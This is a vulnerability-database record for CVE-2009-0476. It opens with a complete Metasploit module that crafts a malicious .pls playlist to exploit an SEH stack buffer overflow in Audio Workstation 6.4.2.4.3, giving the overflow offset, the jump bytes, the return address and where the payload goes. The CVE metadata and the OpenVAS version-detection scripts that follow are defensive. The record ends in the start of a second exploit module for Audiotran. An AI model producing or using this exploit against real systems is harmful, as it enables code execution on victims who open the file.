ID EDB-ID:16661 Type exploitdb Reporter metasploit Modified 2010-09-25T00:00:00
Description
Audio Workstation 6.4.2.4.3 pls Buffer Overflow. CVE-2009-0476. Local exploit for windows platform
##
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
When opening a malicious pls file with the Audio Workstation,
a remote attacker could overflow a buffer and execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'germaya_x', 'dookie', ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-0476' ],
[ 'OSVDB', '55424' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 4100,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
],
'Privileged' => false,
'DisclosureDate' => 'Dec 08 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(1308)
sploit << "\xeb\x16\x90\x90"
sploit << [target.ret].pack('V')
sploit << make_nops(32)
sploit << payload.encoded
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
{"id": "EDB-ID:16661", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", "description": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow. CVE-2009-0476. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "modified": "2010-09-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16661/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2009-0476"], "lastseen": "2016-02-02T06:12:35", "viewCount": 2, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2016-02-02T06:12:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0476"]}, {"type": "exploitdb", "idList": ["EDB-ID:7974", "EDB-ID:7973", "EDB-ID:7958", "EDB-ID:15013", "EDB-ID:10353", "EDB-ID:16626", "EDB-ID:11079"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIO_WKSTN_PLS", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIOTRAN_PLS"]}, {"type": "openvas", "idList": ["OPENVAS:900459", "OPENVAS:900458", "OPENVAS:1361412562310900459", "OPENVAS:1361412562310900458"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84553", "PACKETSTORM:85991"]}], "modified": "2016-02-02T06:12:35", "rev": 2}, "vulnersScore": 8.7}, "sourceHref": "https://www.exploit-db.com/download/16661/", "sourceData": "##\r\n# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\r\n\t\t\t\tWhen opening a malicious pls file with the Audio Workstation,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'germaya_x', 'dookie', ],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0476' ],\r\n\t\t\t\t\t[ 'OSVDB', '55424' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4100,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Dec 08 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tsploit = rand_text_alpha_upper(1308)\r\n\t\tsploit << \"\\xeb\\x16\\x90\\x90\"\r\n\t\tsploit << [target.ret].pack('V')\r\n\t\tsploit << make_nops(32)\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alpha_upper(4652 - payload.encoded.length)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["55424"]}
{"cve": [{"lastseen": "2020-10-03T11:54:11", "description": "Stack-based buffer overflow in MultiMedia Soft AdjMmsEng.dll 7.11.1.0 and 7.11.2.7, as distributed in multiple MultiMedia Soft audio components for .NET, allows remote attackers to execute arbitrary code via a long string in a playlist (.pls) file, as originally reported for Euphonics Audio Player 1.0. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2009-02-08T21:30:00", "title": "CVE-2009-0476", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0476"], "modified": "2018-10-11T21:01:00", "cpe": ["cpe:/a:multimediasoft:audio_sound_editer_for_.net:-", "cpe:/a:multimediasoft:audio_sound_suite_for_.net:-", "cpe:/a:multimediasoft:audio_dj_studio_for_.net:-", "cpe:/a:multimediasoft:audio_sound_recorder_for_.net:-", "cpe:/a:multimediasoft:audio_sound_studio_for_.net:-"], "id": "CVE-2009-0476", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0476", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:multimediasoft:audio_sound_recorder_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_sound_suite_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_sound_studio_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_sound_editer_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_dj_studio_for_.net:-:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:13:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.", "modified": "2017-02-20T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:900458", "href": "http://plugins.openvas.org/nasl.php?oid=900458", "type": "openvas", "title": "MultiMedia Soft Audio Products Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_multimedia_audio_prdts_bof_vuln.nasl 5369 2017-02-20 14:48:07Z cfi $\n#\n# MultiMedia Soft Audio Products Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\n\n Impact level: Application/System\";\n\ntag_affected = \"Following components with AdjMmsEng.dll file version 7.11.2.7 and prior.\n MultiMedia Soft Audio DJ Studio for .NET\n MultiMedia Soft Audio Sound Recorder for .NET\n MultiMedia Soft Audio Sound Editor for .NET\";\ntag_insight = \"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. This issue arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\";\ntag_solution = \"Upgrade to the latest versions\n http://www.multimediasoft.com\";\ntag_summary = \"This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900458);\n script_version(\"$Revision: 5369 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:48:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"MultiMedia Soft Audio Products Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33791\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7973\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\.NETFramework\\AssemblyFolders\\\";\nif(!registry_key_exists(key:key))exit(0);\n\nforeach item(registry_enum_keys(key:key))\n{\n if(item =~ \"(MMS.AudioDjStudio|MMS.AudioSoundEditor|MMS.AudioSoundRecorder)\")\n {\n djPath = registry_get_sz(key:key + item, item:\"InstPath\");\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:djPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:djPath +\n \"\\Redist\\AdjMmsEng.dll\");\n version = GetVer(file:file, share:share);\n if(version != NULL)\n {\n # Grep for 'AdjMmsEng.dll' version less or equal to 7.11.2.7\n if(version_is_less_equal(version:version, test_version:\"7.11.2.7\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.", "modified": "2017-02-20T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:900459", "href": "http://plugins.openvas.org/nasl.php?oid=900459", "type": "openvas", "title": "Euphonics Audio Player Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_euphonics_player_bof_vuln.nasl 5369 2017-02-20 14:48:07Z cfi $\n#\n# Euphonics Audio Player Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\n\n Impact level: Application/System\";\n\ntag_affected = \"Euphonics Audio Player with AdjMmsEng.dll file version 7.11.2.7 and prior.\";\ntag_insight = \"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. This flaw arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\";\ntag_solution = \"Upgrade to the latest version\n http://sourceforge.net/projects/euphonics\";\ntag_summary = \"This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900459);\n script_version(\"$Revision: 5369 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:48:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"Euphonics Audio Player Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/Advisories/33817\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33791\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7958\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7973\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7974\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/0316\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nkey2 = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\";\n\nforeach item (registry_enum_keys(key:key))\n{\n value = registry_get_sz(key:key + item, item:\"DisplayName\");\n if(\"Euphonics\" >< value)\n {\n progDir = registry_get_sz(key:key2, item:\"ProgramFilesDir\");\n phonicsPath = progDir + \"\\Euphonics\\AdjMmsEng.dll\";\n break;\n }\n}\n\nif(!progDir){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\",string:phonicsPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\",string:phonicsPath);\n\nversion = GetVer(file:file, share:share);\nif(version == NULL){\n exit(0);\n}\n# Grep for 'AdjMmsEng.dll' version less or equal to 7.11.2.7\nif(version_is_less_equal(version:version, test_version:\"7.11.2.7\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:1361412562310900458", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900458", "type": "openvas", "title": "MultiMedia Soft Audio Products Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MultiMedia Soft Audio Products Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900458\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"MultiMedia Soft Audio Products Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33791\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7973\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"affected\", value:\"The following components with AdjMmsEng.dll file version 7.11.2.7 and prior.\n\n MultiMedia Soft Audio DJ Studio for .NET\n\n MultiMedia Soft Audio Sound Recorder for .NET\n\n MultiMedia Soft Audio Sound Editor for .NET\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. This issue arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest versions.\");\n\n script_tag(name:\"summary\", value:\"This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\.NETFramework\\AssemblyFolders\\\";\nif(!registry_key_exists(key:key))exit(0);\n\nforeach item(registry_enum_keys(key:key))\n{\n if(item =~ \"(MMS.AudioDjStudio|MMS.AudioSoundEditor|MMS.AudioSoundRecorder)\")\n {\n djPath = registry_get_sz(key:key + item, item:\"InstPath\");\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:djPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:djPath +\n \"\\Redist\\AdjMmsEng.dll\");\n version = GetVer(file:file, share:share);\n if(version != NULL)\n {\n if(version_is_less_equal(version:version, test_version:\"7.11.2.7\"))\n {\n report = report_fixed_ver(installed_version:version, vulnerable_range:\"Less than or equal to 7.11.2.7\", install_path:djPath);\n security_message(port: 0, data: report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-29T22:26:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:1361412562310900459", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900459", "type": "openvas", "title": "Euphonics Audio Player Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Euphonics Audio Player Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900459\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"Euphonics Audio Player Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/Advisories/33817\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33791\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7958\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7973\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7974\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/0316\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"affected\", value:\"Euphonics Audio Player with AdjMmsEng.dll file version 7.11.2.7 and prior.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. This flaw arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version.\");\n\n script_tag(name:\"summary\", value:\"This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nkey2 = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\";\n\nforeach item (registry_enum_keys(key:key))\n{\n value = registry_get_sz(key:key + item, item:\"DisplayName\");\n if(\"Euphonics\" >< value)\n {\n progDir = registry_get_sz(key:key2, item:\"ProgramFilesDir\");\n phonicsPath = progDir + \"\\Euphonics\\AdjMmsEng.dll\";\n break;\n }\n}\n\nif(!progDir){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\",string:phonicsPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\",string:phonicsPath);\n\nversion = GetVer(file:file, share:share);\nif(version == NULL){\n exit(0);\n}\nif(version_is_less_equal(version:version, test_version:\"7.11.2.7\")){\n report = report_fixed_ver(installed_version:version, vulnerable_range:\"Less than or equal to 7.11.2.7\", install_path:phonicsPath);\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:02", "description": "", "published": "2010-02-05T00:00:00", "type": "packetstorm", "title": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0476"], "modified": "2010-02-05T00:00:00", "id": "PACKETSTORM:85991", "href": "https://packetstormsecurity.com/files/85991/Audiotran-1.4.1-PLS-File-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in Audiotran 1.4.1. \nAn attacker must send the file to victim and the victim must open the file. \nAlternatively it may be possible to execute code remotely via an embedded \nPLS file within a browser, when the PLS extention is registered to Audiotran. \nThis functionality has not been tested in this module. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Sebastien Duquette', \n'dookie', \n], \n'Version' => '$Revision: 8306 $', \n'References' => \n[ \n[ 'CVE', '2009-0476'], \n[ 'OSVDB', '55424'], \n[ 'URL', 'http://www.exploit-db.com/exploits/11079' ], \n], \n'Payload' => \n{ \n'Space' => 6000, \n'BadChars' => \"\\x00\\x0a\\x3d\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in 